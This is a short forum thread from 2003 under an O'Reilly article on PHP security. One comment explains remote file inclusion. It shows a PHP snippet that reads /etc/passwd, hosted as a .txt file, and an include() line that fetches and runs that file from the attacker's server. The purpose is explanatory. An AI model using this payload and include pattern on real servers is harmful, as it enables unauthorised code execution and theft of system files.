Article:  |
Ten Security Checks for PHP, Part 1 | |
| Subject: | Not the kind of article i would expect from o'reilly! | |
| Date: | 2003-03-29 05:08:06 | |
| From: | anonymous2 | |
|
Response to: Not the kind of article i would expect from o'reilly!
|
||
|
Include *can* harm o your server, read the comments in the PHP documentation before you spread misinformation:
|
||
Showing messages 1 through 1 of 1.
-
Not the kind of article i would expect from o'reilly!
2003-05-23 00:10:42 clancymalcolm [View]
I can upload a file to my webserver called crack.txt that contains the following:
<?php
readfile("/etc/passwd");
?>
Notice that this is a .txt file - my web server won't execute the PHP code contained in the file.
Now if I can make YOUR web server run the code
include("http://www.mywebserver.com/crack.txt");
Then YOUR web server will show me it's /etc/passwd file. Of course I could have done almost anything else in my source code - delete files, run other programs, etc - almost anything that the web server's user account has permissions to do.
Clancy.